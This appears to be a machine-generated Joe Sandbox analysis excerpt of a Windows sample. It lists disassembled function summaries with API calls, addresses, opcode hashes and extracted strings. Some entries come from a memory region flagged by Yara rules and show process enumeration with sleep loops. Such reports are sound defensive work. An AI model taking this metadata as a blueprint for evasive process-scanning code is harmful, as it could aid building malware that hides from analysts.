                                    • Opcode ID: 447d4e0b5c3a9f8bfe289a024b77f450ce231d76a6bfcfe5e32e216b52d1493a
                                    • Instruction ID: acb610fc98af99c1db3f54d823baed8cb0d1824b7c12ef99b885ffc0f61ca5b2
                                    • Opcode Fuzzy Hash: 447d4e0b5c3a9f8bfe289a024b77f450ce231d76a6bfcfe5e32e216b52d1493a
                                    • Instruction Fuzzy Hash: 17819071744740ABD324DB69CC81FABB7E5BB88B10F10892EF686D7380D678E845CB55
                                    APIs
                                    • CopyRect.USER32(?,00000000), ref: 00443D97
                                    • IsRectEmpty.USER32(?), ref: 00443DA2
                                    • GetClientRect.USER32(00000000,?), ref: 00443DE1
                                    • DPtoLP.GDI32(?,?,00000002), ref: 00443DF3
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00443E30
                                    • CreateRectRgnIndirect.GDI32(?), ref: 00443E48
                                    • OffsetRect.USER32(?,?,?), ref: 00443E6D
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00443E7F
                                      • Part of subcall function 004C3191: __EH_prolog.LIBCMT ref: 004C3196
                                      • Part of subcall function 004C3191: CreatePen.GDI32(?,?,?), ref: 004C31B9
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,00000000), ref: 004C279A
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,?), ref: 004C27B0
                                      • Part of subcall function 004C273C: GetStockObject.GDI32(?), ref: 004C2745
                                      • Part of subcall function 004C273C: SelectObject.GDI32(00414435,00000000), ref: 004C275F
                                      • Part of subcall function 004C273C: SelectObject.GDI32(00414435,00000000), ref: 004C276A
                                      • Part of subcall function 004C28B0: SetROP2.GDI32(?,00000000), ref: 004C28C9
                                      • Part of subcall function 004C28B0: SetROP2.GDI32(?,00000000), ref: 004C28D7
                                    • Rectangle.GDI32(?,?,?,?,?), ref: 00443EF3
                                      • Part of subcall function 004C2BA5: SelectClipRgn.GDI32(?,00000000), ref: 004C2BC7
                                      • Part of subcall function 004C2BA5: SelectClipRgn.GDI32(?,?), ref: 004C2BDD
                                      • Part of subcall function 004C317B: DeleteObject.GDI32(00000000), ref: 004C318A
                                      • Part of subcall function 004C2EEE: __EH_prolog.LIBCMT ref: 004C2EF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$Rect$ClipCreateH_prolog$ClientCopyDeleteEmptyIndirectOffsetRectangleStock
                                    • String ID: pTL
                                    • API String ID: 2567930114-168633513
                                    • Opcode ID: 9c9a84da57ada6ddaee482ede29995664f65bd2041df9b43d564bdf6bc93906f
                                    • Instruction ID: 221e08ce092222e5f7391ac32da923724b7d57e7dec498f9336bbe0ad5ae7e36
                                    • Opcode Fuzzy Hash: 9c9a84da57ada6ddaee482ede29995664f65bd2041df9b43d564bdf6bc93906f
                                    • Instruction Fuzzy Hash: A9616D75504300AFC314DF69C885E6BB7E9EFC8708F048A1DF59683291DBB8EA08CB56
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0044EFFE
                                    • FillRect.USER32(?,?,00000000), ref: 0044F05E
                                    • FillRect.USER32(?,?,00000000), ref: 0044F0CE
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • FillRect.USER32(?,?,00000000), ref: 0044F145
                                    • SelectObject.GDI32(00000000,?), ref: 0044F183
                                    • SetStretchBltMode.GDI32(?,00000000), ref: 0044F1B5
                                    • StretchBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0044F1E8
                                    • SelectObject.GDI32(00000000,?), ref: 0044F21F
                                    • DeleteDC.GDI32(00000000), ref: 0044F22C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Fill$ObjectSelectStretch$BrushClientCreateDeleteH_prologModeSolid
                                    • String ID: pTL
                                    • API String ID: 3514727852-168633513
                                    • Opcode ID: c9e283ac1c631f98ac612fc24d9bb68c081cb28c33ac07d883b7ca7e649dd567
                                    • Instruction ID: 4cd22d6fecae0d1bde94df7a6cf9fb5faba363f4eb1b78a2e503bab71cf30d88
                                    • Opcode Fuzzy Hash: c9e283ac1c631f98ac612fc24d9bb68c081cb28c33ac07d883b7ca7e649dd567
                                    • Instruction Fuzzy Hash: F1610C75204701AFE724DF65C994F6BB3E8FB88704F00892EF95A83240DB75E905CB25
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Mode$ColorCurrentObject$FillPolyStretchText
                                    • String ID:
                                    • API String ID: 544274770-0
                                    • Opcode ID: 1d5bab71774521d4a64bff84ad4520d36c0db43501587c4911c8efeddea002af
                                    • Instruction ID: 77de96109064adbf44b53bbfad18d61faf09a9191d5e0a5a00f93c84edda47c8
                                    • Opcode Fuzzy Hash: 1d5bab71774521d4a64bff84ad4520d36c0db43501587c4911c8efeddea002af
                                    • Instruction Fuzzy Hash: B0516E35210B119BC764DB60D988FABB3A6EF84701F940A2DE16F87250DF78F885CB58
                                    APIs
                                    • GetProfileStringA.KERNEL32(windows,device,,,,,?,000001F4), ref: 0044047F
                                    • GetProfileStringA.KERNEL32(devices,00000000,005DFD88,?,00001000), ref: 004404B3
                                    • GetProfileStringA.KERNEL32(devices,?,,,,,?,000000C8), ref: 0044053A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ProfileString
                                    • String ID: ,,,$device$devices$none$windows
                                    • API String ID: 1468043044-528626633
                                    • Opcode ID: 6bfccbb612cbb3ba4a717ec3bc5e1a3a139b8f01305b4c9fab8859c901b4c85b
                                    • Instruction ID: fa7f01d14492ac0fa5150ca370e6c2da17ad29fba160938f66ee0c7972274479
                                    • Opcode Fuzzy Hash: 6bfccbb612cbb3ba4a717ec3bc5e1a3a139b8f01305b4c9fab8859c901b4c85b
                                    • Instruction Fuzzy Hash: 28B1A3702083809FE324EB65C881FDFB7E4EF95758F404A1EF59583291DB78AA05CB66
                                    APIs
                                    • CreateSolidBrush.GDI32(00000000), ref: 0042097D
                                    • SendMessageA.USER32(?,00000154,00000000,00000000), ref: 004209F5
                                    • SendMessageA.USER32(?,00000153,00000000,?), ref: 00420A0E
                                    • SendMessageA.USER32(?,00000141,?,00000000), ref: 00420A1F
                                    • SendMessageA.USER32(?,00000143,00000000,?), ref: 00420A5B
                                    • SendMessageA.USER32(?,00000143,00000000), ref: 00420A7E
                                    • SendMessageA.USER32(?,0000014E,?,00000000), ref: 00420AAF
                                    • SendMessageA.USER32(?,00000142,00000000,?), ref: 00420AE9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$BrushCreateSolid
                                    • String ID: COMBOBOX
                                    • API String ID: 943060551-1136563877
                                    • Opcode ID: e579a0adb62aa866f88f3ec3171cdcb78fb8f6a5ca5bee03c64a1ecb04133239
                                    • Instruction ID: 49472df15ec56773b8932c812eeab726f1df762034ffda2ecce03c25953fee2e
                                    • Opcode Fuzzy Hash: e579a0adb62aa866f88f3ec3171cdcb78fb8f6a5ca5bee03c64a1ecb04133239
                                    • Instruction Fuzzy Hash: 9871AFB1700B10AFE320DB69CC81F6BB3E5EB84714F504A2EF69687391D678E845CB55
                                    APIs
                                    • SetStretchBltMode.GDI32(?,00000000), ref: 0043A5D4
                                    • GetObjectA.GDI32(?,00000018,?), ref: 0043A6B2
                                    • StretchBlt.GDI32(?,000000FF,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0043A77F
                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,008800C6), ref: 0043A7B9
                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0043A7F3
                                    • SelectObject.GDI32(00000000,?), ref: 0043A878
                                    • StretchBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?), ref: 0043A8BB
                                    • SelectObject.GDI32(00000000,?), ref: 0043A8C7
                                    • DeleteDC.GDI32(00000000), ref: 0043A8CE
                                    • DrawIconEx.USER32(?,?,?,?,?,?,00000000,00000000,00000003), ref: 0043A90D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Stretch$Object$Select$DeleteDrawIconMode
                                    • String ID:
                                    • API String ID: 2323559851-0
                                    • Opcode ID: fc47425ef97f05473bd44afea575be221c1fd43ef92ef980ec8f121d142c4fe3
                                    • Instruction ID: d48a94e1a85d7ace7c618af6ffa5ba3cdfd303b952d6bae7a37ed94e693e6899
                                    • Opcode Fuzzy Hash: fc47425ef97f05473bd44afea575be221c1fd43ef92ef980ec8f121d142c4fe3
                                    • Instruction Fuzzy Hash: 5CB14675644704AFD354DB25CC85F6BB3E9FB88714F208A1DF6A683290DB74EC028B66
                                    APIs
                                    • GetProcAddress.KERNEL32(?,?), ref: 0042A917
                                    • LoadLibraryA.KERNEL32(?,?,?), ref: 0042AA09
                                    • LoadLibraryA.KERNEL32(?,?), ref: 0042AA4F
                                    • LoadLibraryA.KERNEL32(?,?,?,00000001), ref: 0042AA97
                                    • LoadLibraryA.KERNEL32(00000001), ref: 0042AAAD
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042AABF
                                    • FreeLibrary.KERNEL32(00000000), ref: 0042AB52
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressProc$Free
                                    • String ID:
                                    • API String ID: 3120990465-0
                                    • Opcode ID: be945d8b9f74d2d25a15fda3fe271baf465a214912efb68d196ff90e06e56ea4
                                    • Instruction ID: 610a07ea23460aaf15659ed2845d6584fd7f7f6b806a38852aff964e6c7f31be
                                    • Opcode Fuzzy Hash: be945d8b9f74d2d25a15fda3fe271baf465a214912efb68d196ff90e06e56ea4
                                    • Instruction Fuzzy Hash: 05A1CFB1700711ABC314DF65D881FABF3A8BF95314F444A2EF85497341DB38A915CBAA
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 004357ED
                                    • GetWindowRect.USER32(?,?), ref: 004357FC
                                    • IntersectRect.USER32(?,?,?), ref: 00435855
                                    • EqualRect.USER32(?,?), ref: 00435885
                                    • GetWindowRect.USER32(?,?), ref: 004358A3
                                    • OffsetRect.USER32(?,?,?), ref: 0043591A
                                    • OffsetRect.USER32(?,?,00000000), ref: 00435934
                                    • OffsetRect.USER32(?,?,00000000), ref: 0043594C
                                    • OffsetRect.USER32(?,00000000,?), ref: 00435966
                                    • OffsetRect.USER32(?,00000000,?), ref: 0043597E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Offset$Window$EqualIntersect
                                    • String ID:
                                    • API String ID: 2638238157-0
                                    • Opcode ID: 0813bd47002bc1d841343946bc2eb27fc77ffd8947c954d93dc8e3fd7108e843
                                    • Instruction ID: 4beb2ee42f0df3a25851d0158a2c8b3f3a73d78224ee225b60a6aa547435629a
                                    • Opcode Fuzzy Hash: 0813bd47002bc1d841343946bc2eb27fc77ffd8947c954d93dc8e3fd7108e843
                                    • Instruction Fuzzy Hash: 1C51E9B56083069FC708CF29C98096BBBE9AFC8754F104A2EF985D3354DA74ED05CB56
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0242515E
                                    • Process32First.KERNEL32(00000000,00000128), ref: 024251A7
                                    • CharUpperA.USER32(?,00000000,00000128,00000002,00000000), ref: 024251BB
                                    • Sleep.KERNEL32(00000400), ref: 02425231
                                    • Sleep.KERNEL32(00000400), ref: 0242527C
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 02425290
                                    • CharUpperA.USER32(?,00000000,00000128,00000000,00000128,00000002,00000000), ref: 024252A4
                                    • Sleep.KERNEL32(00000400), ref: 024252EF
                                    • Sleep.KERNEL32(00000400), ref: 02425367
                                    • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 0242537D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CharProcess32Uppertolower$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4243119484-0
                                    • Opcode ID: 2beb91a4a468f440c53eb63d251f9dee6394db2a47ff98973aa30104e11c03e3
                                    • Instruction ID: 9dd1f937257e04917ed6ccf9b94fa6a6191a9fe0d07587a2aa4c2f84e522fd2d
                                    • Opcode Fuzzy Hash: 2beb91a4a468f440c53eb63d251f9dee6394db2a47ff98973aa30104e11c03e3
                                    • Instruction Fuzzy Hash: 6951C4B1D002288BDB28EF52CD48BEAB775AF44304F8045DAD50AA7240D7B5AFC5CFA1
                                    APIs
                                    • CreateSolidBrush.GDI32(00000000), ref: 004143D8
                                    • SendMessageA.USER32(?,000000C5,?,00000000), ref: 00414469
                                    • SendMessageA.USER32(?,000000CC,?,00000000), ref: 00414481
                                    • SendMessageA.USER32(?,00000465,00000000,?), ref: 0041454B
                                    • SendMessageA.USER32(?,000000B1,?,?), ref: 00414588
                                    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00414597
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$BrushCreateSolid
                                    • String ID: EDIT$msctls_updown32
                                    • API String ID: 943060551-1401569126
                                    • Opcode ID: 707c975f4670d50386fd4e61e202c3a467beaffa6b37b0fb3f88a0226d56482c
                                    • Instruction ID: cbaa40f897137ba9cd8e8e9ff6fa29725c37e5d0561e397f5141d0d33328975e
                                    • Opcode Fuzzy Hash: 707c975f4670d50386fd4e61e202c3a467beaffa6b37b0fb3f88a0226d56482c
                                    • Instruction Fuzzy Hash: 9991C271700B05ABE724DB28CC45FABB3E5BBC4744F10491EF6A6D7380DA78E8818B59
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Object__ftol$Stock
                                    • String ID: DISPLAY
                                    • API String ID: 4221631233-865373369
                                    • Opcode ID: 98bb9be8dcaa1b29be262afb6ebdb1c8d8f6d1f71898e13bb5702acc084852c2
                                    • Instruction ID: 9b7bd0461c7c74b99b9863cb13fad8438760ba74cfd308decd75e788b02e6043
                                    • Opcode Fuzzy Hash: 98bb9be8dcaa1b29be262afb6ebdb1c8d8f6d1f71898e13bb5702acc084852c2
                                    • Instruction Fuzzy Hash: 7B41E034704341DBC710EF25EC81B6A77A4FB89754F440A3EF58AA6291DB78D505CB2A
                                    APIs
                                    • TlsGetValue.KERNEL32(006142FC,006142EC,00000000,005BDEE8,006142FC,?,004C6066,006142EC,00000000), ref: 004C5E09
                                    • RtlEnterCriticalSection.NTDLL(00614318), ref: 004C5E58
                                    • RtlLeaveCriticalSection.NTDLL(00614318), ref: 004C5E6B
                                    • LocalAlloc.KERNEL32(00000000,00000004,?,004C6066,006142EC,00000000), ref: 004C5E81
                                    • LocalReAlloc.KERNEL32(?,00000004,00000002,?,004C6066,006142EC,00000000), ref: 004C5E93
                                    • TlsSetValue.KERNEL32(006142FC,00000000,004C6066,006142EC,00000000), ref: 004C5ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                    • String ID: Ba$^L
                                    • API String ID: 4117633390-3130641138
                                    • Opcode ID: fae1185300be86e148c4d8e9761e919a6f19d041a228f615f53b60fd7df0a822
                                    • Instruction ID: 4d8f5be919c5874d551e461a6ed4cccc98f6d5f20499c33f7d43f521ecd37e4a
                                    • Opcode Fuzzy Hash: fae1185300be86e148c4d8e9761e919a6f19d041a228f615f53b60fd7df0a822
                                    • Instruction Fuzzy Hash: 6B318979100A05AFD768CF55C889F6AB7E8FB45364B00852EE416C7680EB34FA45CB64
                                    APIs
                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004AF8AE,?,Microsoft Visual C++ Runtime Library,00012010,?,005ADA04,?,005ADA54,?,?,?,Runtime Error!Program: ), ref: 004B6D14
                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004B6D2C
                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004B6D3D
                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004B6D4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                    • API String ID: 2238633743-4044615076
                                    • Opcode ID: 4c2b5f940e1253108646d926ccc366a7193f0494c490198f7cf03a44a263494d
                                    • Instruction ID: 06ca2b8fa5eb77ca048fb3b641c849557bfcadf9952bd0d7960e7dd5dffc7da0
                                    • Opcode Fuzzy Hash: 4c2b5f940e1253108646d926ccc366a7193f0494c490198f7cf03a44a263494d
                                    • Instruction Fuzzy Hash: CD012C71B01201AF87109FB59C889AB7FEDBF8978031A583BB504D7271DA78C8019B76
                                    APIs
                                    • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004C0589,?,00020000,00020000,00000000,?,?,00000000,EDIT,?,?,?), ref: 004C0298
                                    • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,?,00000000,EDIT,?,?,?,?,?,?,?,?), ref: 004C02A1
                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004C02B5
                                    • 6FBA1CD0.COMCTL32(?,?,00000000,EDIT,?,?,?,?,?,?,?,?), ref: 004C02D0
                                    • 6FBA1CD0.COMCTL32(?,?,00000000,EDIT,?,?,?,?,?,?,?,?), ref: 004C02EC
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,EDIT,?,?,?,?,?,?,?,?), ref: 004C02F8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeHandleLoadModuleProc
                                    • String ID: COMCTL32.DLL$InitCommonControlsEx
                                    • API String ID: 1437655972-4218389149
                                    • Opcode ID: 1309586a1cd7b6d69c177071e2ab8e3d81fee11640ce42ddc9a562737db91a0b
                                    • Instruction ID: 67d4f3cbeeb7557b7e1314775cd264c5762493dccd5b742e37a990a4114052e8
                                    • Opcode Fuzzy Hash: 1309586a1cd7b6d69c177071e2ab8e3d81fee11640ce42ddc9a562737db91a0b
                                    • Instruction Fuzzy Hash: E8F0C836E41662C783515FE49D4CE5B77ECAB98751B05047AF940E3210CB28DC01876E
                                    APIs
                                    • IsChild.USER32(?,?), ref: 00430E08
                                    • GetParent.USER32(?), ref: 00430E99
                                    • IsWindow.USER32(?), ref: 00430FCB
                                    • IsWindowVisible.USER32(?), ref: 00430FDD
                                      • Part of subcall function 004C08B1: IsWindowEnabled.USER32(?), ref: 004C08BB
                                    • GetParent.USER32(?), ref: 0043102E
                                    • IsChild.USER32(?,?), ref: 0043104E
                                    • GetParent.USER32(?), ref: 004311F7
                                    • SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 00431214
                                    • IsWindow.USER32(?), ref: 0043126F
                                      • Part of subcall function 004271F0: IsChild.USER32(?,?), ref: 0042726D
                                      • Part of subcall function 004271F0: GetParent.USER32(?), ref: 00427287
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ParentWindow$Child$EnabledMessageSendVisible
                                    • String ID:
                                    • API String ID: 2452671399-0
                                    • Opcode ID: 18fab21ca8e785dd97d3cec3ad59cf09a5dbf989cec1da10be882055bf33c453
                                    • Instruction ID: 84cd61234a96ed9dbfc6299b7c26b9f54620b193deddb7a4de03561b851213be
                                    • Opcode Fuzzy Hash: 18fab21ca8e785dd97d3cec3ad59cf09a5dbf989cec1da10be882055bf33c453
                                    • Instruction Fuzzy Hash: 30E19E716043519FC724DF65C881BABB7E4BB89704F004A2EFA8597391D738E845CB9A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db2d7718b3ae568a4963ff14bf0c9cab6fd19b9150b3b675c43aa8d0458955fe
                                    • Instruction ID: 15ea42248ce17e491cc65b5cbe9edc6466db66887710ff071872ed7f0c3f538e
                                    • Opcode Fuzzy Hash: db2d7718b3ae568a4963ff14bf0c9cab6fd19b9150b3b675c43aa8d0458955fe
                                    • Instruction Fuzzy Hash: 5481ADB63106019FE320DF69DC85FABB3A8EB94348F10892FF142CB291D775E8458B94
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2cb2a24cc438ee2cd46d295e0548d5788c7db548abc5b29f49fb2fb50632e1af
                                    • Instruction ID: 9b7a02632a811da30e1344556ac7f4b1594854922987e6e717ed9396e8de9825
                                    • Opcode Fuzzy Hash: 2cb2a24cc438ee2cd46d295e0548d5788c7db548abc5b29f49fb2fb50632e1af
                                    • Instruction Fuzzy Hash: 797190723406059FD720DF68DC85FABB3A8EB94349F10893FF142CB291D765E84A9B94
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,00000100,005ADC8C,00000001,00000000,00000000,00000100,00000001,?), ref: 004B2C69
                                    • LCMapStringA.KERNEL32(00000000,00000100,005ADC88,00000001,00000000,00000000), ref: 004B2C85
                                    • LCMapStringA.KERNEL32(?,?,?,?,00000001,?,00000100,00000001,?), ref: 004B2CCE
                                    • MultiByteToWideChar.KERNEL32(?,00000002,?,?,00000000,00000000,00000100,00000001,?), ref: 004B2D06
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,?,00000000), ref: 004B2D5E
                                    • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 004B2D74
                                    • LCMapStringW.KERNEL32(?,?,00000001,00000000,00000001,?), ref: 004B2DA7
                                    • LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 004B2E0F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: String$ByteCharMultiWide
                                    • String ID:
                                    • API String ID: 352835431-0
                                    • Opcode ID: df5238649cd02f9ca87aa827010914762ec849130b77a4c7b2aa874a606f4788
                                    • Instruction ID: ad04b330dc2e354b94eeea703679cc1b95b43c2c72cc8abaa63f314cb391023d
                                    • Opcode Fuzzy Hash: df5238649cd02f9ca87aa827010914762ec849130b77a4c7b2aa874a606f4788
                                    • Instruction Fuzzy Hash: 20519D31900249EBCF228F95CE49EEF7FB9FB48750F14412AF911A1260D3798C50EBA5
                                    APIs
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • lstrcat.KERNEL32(?,024A3DEC), ref: 0242D9ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0242DABE
                                    • lstrcat.KERNEL32(00000000,024A5708), ref: 0242DB20
                                    • lstrcat.KERNEL32(00000000,024A570C), ref: 0242DB32
                                    • lstrcat.KERNEL32(00000000,024A5710), ref: 0242DB5B
                                    • lstrlen.KERNEL32(00000000,%s,0242E3E7,?,?,?,?,?,?), ref: 0242DB71
                                      • Part of subcall function 0242D7CF: lstrlen.KERNEL32(00000000), ref: 0242D7E8
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56EC), ref: 0242D816
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56F0), ref: 0242D83C
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56F4), ref: 0242D84B
                                      • Part of subcall function 0242D7CF: lstrlen.KERNEL32(00000000), ref: 0242D8A6
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56F8), ref: 0242D8DA
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56FC), ref: 0242D900
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$ExchangeInterlockedlstrcpy
                                    • String ID: %s
                                    • API String ID: 3361872186-3043279178
                                    • Opcode ID: 4f9cfca9db7b09f080ec9857a116f6212edf3f639a15fb9e6cb19dfc517ad06b
